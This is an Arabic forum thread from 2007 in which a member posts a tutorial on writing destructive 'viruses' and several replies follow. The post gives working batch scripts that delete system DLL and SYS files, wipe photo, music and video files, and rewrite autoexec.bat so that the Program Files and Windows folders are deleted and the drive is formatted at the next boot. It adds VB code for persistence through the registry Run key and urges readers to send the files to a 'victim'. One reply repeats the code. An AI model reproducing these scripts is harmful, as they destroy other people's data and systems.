الوسام .. الاكاديمي ابن الجنوب ..حسن القرشي ... لؤلؤة زهران كل الحكاية قسم المحاورة


 
 عدد الضغطات  : 5725


إهداءات




فيروسات

منتدى البرامج الكاملة الجديدة وشرح البرامج والدروس


مشاهدة نتائج الإستطلاع: ما رأيكم
ممتاز 3 100.00%
ضعيف 0 0%
المصوتون: 3. أنت لم تصوت في هذا الإستطلاع

إضافة رد
#1  
قديم 25/10/2007, 04:15 AM
قاهر التنين âيه ôîًَىà
 عضويتي » 7464
 تسجيلي » Oct 2007
 آخر حضور » 14/10/2009 (02:48 AM)
مشآركاتي » 251
 نقآطي » 10
 معدل التقييم » قاهر التنين is on a distinguished road
دولتي » دولتي الحبيبه
جنسي  »
 
فيروسات



السلام عليكم ورحمه الله وبركاته
شرح لأقوى طرق تصميم فيروس لن تجد مثله
بسم الله الرحمن الرحيم
هذا الموضوع من اقوى المواضيع التى تجذب القراء و الراغبين فى تعلم الهكر و تجذب
اكثر محبى البرمجة الذين يسعون الى تعلم كل جديد فى مجال البرمجة
و نظرا لأنى واحد من محبى البرمجة احببت ان ابحث فى النت لتعلم طرق صناعة الفيروسات
و الحمد لله وجدت الكثير من المعلومات التى افادتنى و دلتنى الى الطريق الذى انا اريده لذا اردت
ان اعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس
احب ان اوضح ان الطرق سوف اشرحها هنا و هى عبارة عن 4 اجزاء و هى كل ما انا كتبته حتى الأن
و سوف اضعها كلها هنا و هذا للتسهيل على كل من يجد هذا الموضوع مهم و يجذب
ارجوا اولا قبل البدأ فى هذا الموضوع ان اوضح شئ ان هذا الموضوع من نتاج تعب كبير مر على حتى
انتجت مثل هذا الموضوع لذا ارجوا من كل من يريد نقل الموضوع ان يكتب انه نقله من و يكتب اسم المنتدى الذى نقله منه
قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هى التعريف بالفيروس و انواعه و شروطه
و التى سوف اوضحها الأن
نبدأ الموضوع
تعريف الفيروس :
يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا او اعتمادا على احد برامج ويندوز دون علم المستخدم بذلك
و هناك فيروسات تشغل نفسها بناء على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو تشيرنوبل
الذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الأسم نسبة الى الفيروسات الموجودة فى جسم
الأنسان و التى تصيبه و تتكاثر بسرعة فيه و هى نفس فكرة عمل الفيروس الذى يصيب الكومبيوتر
و يجب توافر عدة شروط لكى يصبح الفيروس ذو فاعلية و هى
أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه
أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباط باحد الملفات
أن يكون ذا هدف و مغزى
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
الأن و بعد ان فهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم
ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا
(( اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجو ان تقوم بفهم الموضوع دون اى محاولة
منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اى خطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير
نظام التشغيل لذا ارجو الحزر من تصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))
الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فى صناعة الفيروسات
لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة من الطرق لتصميم الفيروسات و هى
عن طريق الـnotepad
عن طريق برنامج الفجول بيسك (vb)
عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)
و سوف اقوم الأن بعرض كل منهم على حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقوم به
الموقع لا يتحمل مايحدث لجهازك عند تحميلك احد البرامج المدرجه من قبل عضو
__________________
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلم تصميم الفيروس بواسطة notepad
للعمل على تصميم فيروس بهذا النوع من التصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها
لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat
و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسب لك فى الnotepad
و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس
على جهاز التجارب اذا كان لديك
قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولة طبعا ولاكنى وضعت تحت كل كود اكبر شرح
استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه
اريد ان اوضح انه من الأفضل نسخ الكود و لصقه فى المكان الذى تريده
----------------------
نبدأ بالكود الأول :
---------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ
ان شكل الأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر
الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات
ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها
الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اول
الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز
عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن
ملفات الويندوز
* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه
جيدا لذا نحن يمكننا ان نغير هذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذى يمكننا ان نغيره فى
الكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف
يوجد فيه فمثلا هناك منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس
الى d:
مثال توضيحى :
انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح
جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع
امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
ايه رايكم دلوقتى فى الفيروس الجديد اتمنى يعجبكم اما الأن فلنقراء الكود الثانى
----------------










تااااااااااااااااااااااابعععععععععععععع

--------------------------------------------------------------------------------

الكود الثانى :
--------------
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\*******\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\*******\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\*******\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضـــــــــــتيح :
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة
تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا
اليروس هو الوحيد
بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله
هم الفكرة الأسايه و هما ما سوف نحن نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز
و نلاحظ تكراره فى مسح الويندوز فى الكود
echo deltree /y c:\*******\*.* >nul >>c:\autoexec.bat
ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا
استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
echo copy c:\*******\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\*******\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز
فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير *******
فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال
و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز
و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
----------------
الكود الثالث :
--------------
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\*******\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\*******\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\*******\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف
اوضح اكواده
الخاصــــــــــــــية الأولى :-
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\*******\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من
التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى مع
ه











تااااااااااااااااااااااابعععععععععععععع

--------------------------------------------------------------------------------


الخاصــــــــــــــية الثانيه :-
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\*******\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\*******\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\*******\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا من استخدامها
و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على ى كود اخر فسوف
اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع لذا انتظروا منى المفيد
و هدا الكود يمكن اضافته الى سرفر البرورات وسيب 7
لكي تصلكم الايبهات اثناء اشتغال الكمبيوتر
______________









 توقيع : قاهر التنين



رد مع اقتباس

اخر 5 مواضيع التي كتبها قاهر التنين
المواضيع المنتدى اخر مشاركة عدد الردود عدد المشاهدات تاريخ اخر مشاركة
ياناس ادخلو والله انه لامر هام المنتدى الإسلامي 7 1503 11/01/2008 04:02 AM
ضع اسمك منتدى البرامج الكاملة الجديدة وشرح البرامج والدروس 0 1298 26/12/2007 11:43 AM
هذا هم جماهير الهلال منتدى الرياضة المحلية والعالمية 4 1140 24/12/2007 05:10 AM
أتحداكم تحلونه الجزء 2 منتدى المرح والوناسة وسعة الصدر 11 2534 23/12/2007 07:48 AM
الرجاء من الكل الدخول لهذه الصفحه الصفوف الاولية 19 3267 22/12/2007 07:29 AM

قديم 25/10/2007, 05:05 AM   #2


الصورة الرمزية أحلـى
أحلـى âيه ôîًَىà

 عضويتي » 5072
 تسجيلي » Nov 2006
 آخر حضور » 19/11/2009 (02:33 AM)
مشآركاتي » 2,516
 نقآطي » 80
دولتي » دولتي الحبيبه
جنسي  »
 
 Awards Showcase »
افتراضي



قاهر التنين لاااااااااااااااااااااااتعلمهم نروح فيها

بس يمكن اناالي اتعلمه

يالله تسلم على موضوعك تقبل تحياتي


 
 توقيع : أحلـى



رد مع اقتباس
قديم 25/10/2007, 10:42 PM   #3


الصورة الرمزية قاهر التنين
قاهر التنين âيه ôîًَىà

 عضويتي » 7464
 تسجيلي » Oct 2007
 آخر حضور » 14/10/2009 (02:48 AM)
مشآركاتي » 251
 نقآطي » 10
دولتي » دولتي الحبيبه
جنسي  »
 
افتراضي



شكراً على مرورك أحلى زهرانيه و إنشا الله راح أذهلكم بمواضيعي


 
 توقيع : قاهر التنين




رد مع اقتباس
قديم 25/10/2007, 11:50 PM   #4


الصورة الرمزية جارالله اللساب
جارالله اللساب âيه ôîًَىà

 عضويتي » 125
 تسجيلي » Dec 2004
 آخر حضور » 03/10/2012 (02:58 PM)
مشآركاتي » 2,157
 نقآطي » 800
دولتي » دولتي الحبيبه
جنسي  »
 
 Awards Showcase »
افتراضي



اقتباس : المشاركة الأصلية كتبت بواسطة قاهر التنين [ مشاهدة المشاركة ]

call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\*******\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\*******\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\*******\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat


موضوع مفيد للأشخاص المبتدئين لكيفيه عمل تجميع الفيروس

ومن الآن وصاعداً تشوف كل عضو يطبق الطريقه ويسوى فيروس باسمه ويصبح المنتدى نخاف منه



وهناك إضافة بسيطه وهامه في نفس الوقت :

call attrib -h -r c:\autoexec.bat >nul

هذا الكود للتعريف بأنه فيروس وبدونه لا يشتغل الملف فهو يجعله ينسخ نفسه داخل ملف :

autoexec.bat

الموجود في :

c:\autoexec.bat

كما ذكره كاتبنا سابقاً وله الشكر


وليكن في الحسبان بأن من عيوب هذا الفيروس :

أنه عند بدء تشغيل إقلاع ويندوز تتم قراءة الأوامر الموجوده فى هذا الملف مسبقاً وتنفيذها عن طريق الدوس أولاً ثم يبحث عن نظام التشغيل فى جهازك ..

وكذلك ينتظر إعادة تشغيل الجهاز وليس العمل المباشر لأنه وقتها يحفظ نفسه في ملف :

autoexec.bat

الموجود في :

c:\autoexec.bat


(( والله يخارجنا ))


والحل لمثل هذه الفيروسات التي تنتظر إعاده تشغيل الجهاز سهل جداً وبدون أي برامج تستعين بها فبمجرد الدخولد على ملف

autoexec.bat

قم بتغير الإمتداد إلى :

autoexec.txt

وشكراً لك على هذا المجهود .. ونتمنى المزيد من مواضيعك الرائعه


 

رد مع اقتباس
قديم 26/10/2007, 02:02 AM   #5


الصورة الرمزية قاهر التنين
قاهر التنين âيه ôîًَىà

 عضويتي » 7464
 تسجيلي » Oct 2007
 آخر حضور » 14/10/2009 (02:48 AM)
مشآركاتي » 251
 نقآطي » 10
دولتي » دولتي الحبيبه
جنسي  »
 
افتراضي



شكراً لك advisor على هذه الإضافه


 
 توقيع : قاهر التنين




رد مع اقتباس
إضافة رد


(مشاهدة الكل عدد الذين شاهدوا هذا الموضوع : 0 :
لا يوجد أعضاء

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الإعلانات النصية ( أصدقاء الأكاديمية )

انشر مواضيعك بالمواقع العالمية من خلال الضغط على ايقونة النشر الموجودة اعلاه

الساعة الآن 05:06 AM

Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
HêĽм √ 3.1 BY: ! ωαнαм ! © 2010
جميع الحقوق محفوظة © لأكاديمية العرضة الجنوبية رباع

a.d - i.s.s.w